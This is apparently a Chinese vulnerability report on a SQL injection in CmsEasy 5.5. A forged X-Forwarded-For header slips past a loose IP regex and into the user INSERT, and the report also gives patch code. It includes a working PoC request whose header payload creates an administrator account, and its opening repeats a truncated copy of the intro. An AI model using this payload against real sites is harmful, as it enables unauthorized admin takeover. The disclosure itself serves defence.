### 简要描述: CmsEasy最新版SQL注入可注册管理员 ### 详细说明: CmsEasy_5.5_UTF-8_20140420.rar 官方最新版存在SQL注入,无视GPC,可获取管理员账户,可注册管理员 不知道跟之前蓝哥的那个重复么,先发再看吧。。。 文件/lib/default/user_act.php ``` function respond_action() { ini_set("display_errors","On"); $classname = front::$get['ologin_code']; if(front::post('regsubmit')) { if(!config::get('reg_on')) { front::flash(lang('网站已经关闭注册!')); return; } if(front::post('username') != strip_tags(front::post('username')) ||front::post('username') != htmlspecialchars(front::post('username')) ) { front::flash(lang('用户名不规范!')); return; } if(strlen(front::post('username'))<4) { front::flash(lang('用户名太短!')); return; } if(front::post('username') &&front::post('password')) { $username=front::post('username'); $password=md5(front::post('password')); $data=array( 'username'=>$username, 'password'=>$password, 'groupid'=>101, 'userip'=>front::ip(), //======问题在这里====== $classname=>session::get('openid'), ); if($this->_user->getrow(array('username'=>$username))) {...
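### 简要描述: CmsEasy最新版SQL注入可注册管理员

### 详细说明:

CmsEasy_5.5_UTF-8_20140420.rar 官方最新版存在SQL注入。注入数据来自 HTTP 请求头(`Client-IP` / `X-Forwarded-For`),不经过 GET/POST/COOKIE,因此 magic_quotes_gpc 对它不起作用("无视GPC");利用后可直接向 user 表写入任意行,注册管理员账户。

不知道跟之前蓝哥的那个重复么,先发再看吧。。。

文件 /lib/default/user_act.php:

```php
function respond_action() {
    // Turns on error display for this request: any SQL error text is shown to the caller.
    ini_set("display_errors","On");
    // $classname comes straight from the query string. Below it is used as an
    // array key (a column name in the INSERT / UPDATE / WHERE that get built),
    // as an include_once path and as a class name; nothing in this function
    // restricts it. Whether front::$get filters it elsewhere is not shown here.
    $classname = front::$get['ologin_code'];
    if(front::post('regsubmit')) {
        if(!config::get('reg_on')) {
            front::flash(lang('网站已经关闭注册!'));
            return;
        }
        // Username checks are about HTML only (strip_tags / htmlspecialchars), not SQL.
        if(front::post('username') != strip_tags(front::post('username')) ||front::post('username') != htmlspecialchars(front::post('username')) ) {
            front::flash(lang('用户名不规范!'));
            return;
        }
        if(strlen(front::post('username'))<4) {
            front::flash(lang('用户名太短!'));
            return;
        }
        if(front::post('username') &&front::post('password')) {
            $username=front::post('username');
            $password=md5(front::post('password'));
            $data=array(
                'username'=>$username,
                'password'=>$password,
                'groupid'=>101,
                // front::ip() returns the raw Client-IP / X-Forwarded-For header
                // value (see the listing below); this is the value injected in the PoC.
                'userip'=>front::ip(),
                //====== the problem is here ======
                $classname=>session::get('openid'),
            );
            if($this->_user->getrow(array('username'=>$username))) {
                front::flash(lang('该用户名已被注册!'));
                return;
            }
            // $data (keys and values) goes into the INSERT here.
            $insert=$this->_user->rec_insert($data);
            $_userid = $this->_user->insert_id();
            if($insert){
                front::flash(lang('注册成功!'));
            }else {
                front::flash(lang('注册失败!'));
                return;
            }
            $user=$data;
            cookie::set('login_username',$user['username']);
            cookie::set('login_password',front::cookie_encode($user['password']));
            session::set('username',$user['username']);
            front::redirect(url::create('user'));
            exit;
        }
    }
    if (front::post('submit')) {
        if (front::post('username') && front::post('password')) {
            $username = front::post('username');
            $password = md5(front::post('password'));
            $data = array(
                'username' => $username,
                'password' => $password,
            );
            $user = new user();
            $row = $user->getrow(array('username' => $data['username'], 'password' => $data['password']));
            if (!is_array($row)) {
                $this->login_false();
                return;
            }
            // Same unvalidated $classname used as the column name of the UPDATE.
            $post[$classname] = session::get('openid');
            $this->_user->rec_update($post, 'userid=' . $row['userid']);
            cookie::set('login_username', $row['username']);
            cookie::set('login_password', front::cookie_encode($row['password']));
            session::set('username', $row['username']);
            front::redirect(url::create('user'));
            return;
        } else {
            $this->login_false();
            return;
        }
    }
    // $classname also selects the file to include and the class to instantiate.
    include_once ROOT.'/lib/plugins/ologin/'.$classname.'.php';
    $ologinobj = new $classname();
    $status = $ologinobj->respond();
    //var_dump(session::get('openid'));exit;
    $where[$classname] = session::get('openid');
    if(!$where[$classname]) front::redirect(url::create('user'));
    $user = new user();
    $data = $user->getrow($where);
    if(!$data){
        $this->view->data = $status;
    }else{
        cookie::set('login_username',$data['username']);
        cookie::set('login_password',front::cookie_encode($data['password']));
        session::set('username',$data['username']);
        front::redirect(url::create('user'));
    }
}
```

我们再进入 ip() 函数,文件 /lib/tool/front_class.php:

```php
static function ip() {
    // Client-IP and X-Forwarded-For are ordinary request headers: any client can
    // set them, and here they take precedence over the server-provided REMOTE_ADDR.
    if ($_SERVER['HTTP_CLIENT_IP']) {
        $onlineip = $_SERVER['HTTP_CLIENT_IP'];
    } elseif ($_SERVER['HTTP_X_FORWARDED_FOR']) {
        $onlineip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    } elseif ($_SERVER['REMOTE_ADDR']) {
        $onlineip = $_SERVER['REMOTE_ADDR'];
    } else {
        $onlineip = $_SERVER['REMOTE_ADDR'];
    }
    // The format check only runs when ipcheck_enable is set; with it off the
    // header value is returned untouched.
    if(config::get('ipcheck_enable')){
        // First pattern: strict dotted IPv4, anchored with $ -- the PoC value fails it.
        // Second pattern: IPv6 forms whose LAST alternative is a bare IPv4, followed by
        // an optional "(%.+)?" tail and "\s*". That tail is what the PoC rides on.
        if(!preg_match('/^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$/', $onlineip)
            &&!preg_match('@^\s*((([0-9A-Fa-f]{1,4}:){7}(([0-9A-Fa-f]{1,4})|:))|(([0-9A-Fa-f]{1,4}:){6}(:|((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})|(:[0-9A-Fa-f]{1,4})))|(([0-9A-Fa-f]{1,4}:){5}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(([0-9A-Fa-f]{1,4}:){4}(:[0-9A-Fa-f]{1,4}){0,1}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(([0-9A-Fa-f]{1,4}:){3}(:[0-9A-Fa-f]{1,4}){0,2}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(([0-9A-Fa-f]{1,4}:){2}(:[0-9A-Fa-f]{1,4}){0,3}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(([0-9A-Fa-f]{1,4}:)(:[0-9A-Fa-f]{1,4}){0,4}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(:(:[0-9A-Fa-f]{1,4}){0,5}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})))(%.+)?\s*$@', $onlineip)){
            exit('来源非法');
        }
    }
    return $onlineip;
}
```

乍一看没什么问题,对 ip 做了格式校验。但看第二个正则的结尾:`(%.+)?\s*$`。`%` 后面的 `.+` 可以是除换行外的任意字符,而这个正则的最后一个分支本身就是一个裸 IPv4,所以 `127.0.0.1%xxxxxx` 能匹配第二个正则,`!A && !B` 为假,校验就这样被绕过了(`%` 本意应是 IPv6 的 zone-id,如 `fe80::1%eth0`,但这里既没有限制 zone-id 的字符集,又对 IPv4 分支同样生效)。另外 `\s*` 也允许首尾带空白;而 `ipcheck_enable` 关闭时根本不做任何检查。难道这是后门?!

### 修复建议

1. `front::ip()`:不信任任何请求头,只取 `REMOTE_ADDR`;无论 `ipcheck_enable` 是否开启都做校验,并用 `filter_var` 代替手写正则:

```php
static function ip() {
    // REMOTE_ADDR is the only address the web server itself fills in.
    // Client-IP / X-Forwarded-For are plain request headers under the caller's
    // control and are not consulted. A deployment behind a trusted reverse
    // proxy should take the proxy-appended hop from X-Forwarded-For only after
    // matching REMOTE_ADDR against a fixed list of proxy addresses (not shown).
    $onlineip = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '';
    // Validate unconditionally, since the value is written to the user table.
    // FILTER_VALIDATE_IP accepts a literal IPv4/IPv6 address only: no surrounding
    // whitespace, no "%zone" tail, hence no quote, parenthesis or comment characters.
    if (filter_var($onlineip, FILTER_VALIDATE_IP) === false) {
        exit('来源非法');
    }
    return $onlineip;
}
```

2. `respond_action()`:`$classname` 在被当作列名、文件名和类名使用之前,只允许是对应已安装 ologin 插件的标识符(若 respond 流程也可能在没有 `ologin_code` 时进入,按实际情况调整处理方式):

```php
$classname = front::$get['ologin_code'];
// Only accept an identifier that names an installed ologin plugin: it is used
// as a column name, an include path and a class name further down.
if (!preg_match('/^[A-Za-z0-9_]+$/', $classname)
    || !is_file(ROOT.'/lib/plugins/ologin/'.$classname.'.php')) {
    front::redirect(url::create('user'));
    return;
}
```

3. 根本原因还在数据层:从 PoC 的结果看,`rec_insert()` / `rec_update()` 把数组的值直接拼进了 SQL(其代码未在本文给出,需核实)。应对所有值使用预处理语句或逐个转义,列名只允许来自白名单。只修 `ip()` 堵不住 `$classname` 这条列名注入路径。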
最后,`$data['userip']`(即 `front::ip()` 原样返回的请求头值)进入 `$insert=$this->_user->rec_insert($data);`,被拼进 INSERT 语句,注入由此产生。

### 漏洞证明:

之前的用户信息:

[<img src="https://images.seebug.org/upload/201406/04173851c32d6175893d49402f04ef758921b872.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/04173851c32d6175893d49402f04ef758921b872.png)

发送请求(payload 放在 `X-Forwarded-For` 中;`ip()` 先读 `Client-IP`,若请求里也带了该头则以它为准,payload 同样可以放在那里):

```
POST /cmseasy1/index.php?case=user&act=respond HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
X-Forwarded-For: 127.0.0.1%'),('xfkxfk','e10adc3949ba59abbe56e057f20f883e','2','127.0.0.1')#

username=666666&password=666666&regsubmit=%2B%E6%B3%A8%E5%86%8C%2B
```

payload 说明:`127.0.0.1%` 满足第二个正则"裸 IPv4 + `(%.+)?`"的分支,其后的内容全部落在 `.+` 里;`'),(` 闭合当前 VALUES 元组并另起一个元组,写入用户名 `xfkxfk`、密码 `e10adc3949ba59abbe56e057f20f883e`(即 md5("123456"))和 groupid `2`;`#` 把 SQL 剩余部分注释掉。注意请求里没有 `ologin_code`,所以 `$classname` 为空,而注入的元组只有 4 个值仍能成功——看起来 `rec_insert()` 丢弃了空键,这一点未在本文核实。

[<img src="https://images.seebug.org/upload/201406/041739140b5bdd8506a372e702c392fecf8752bf.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/041739140b5bdd8506a372e702c392fecf8752bf.png)

成功添加管理员 xfkxfk(从结果看 groupid 2 即管理员组):

[<img src="https://images.seebug.org/upload/201406/04173927c19d085b963cfb1d6b387cbe0b2216b0.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/04173927c19d085b963cfb1d6b387cbe0b2216b0.png)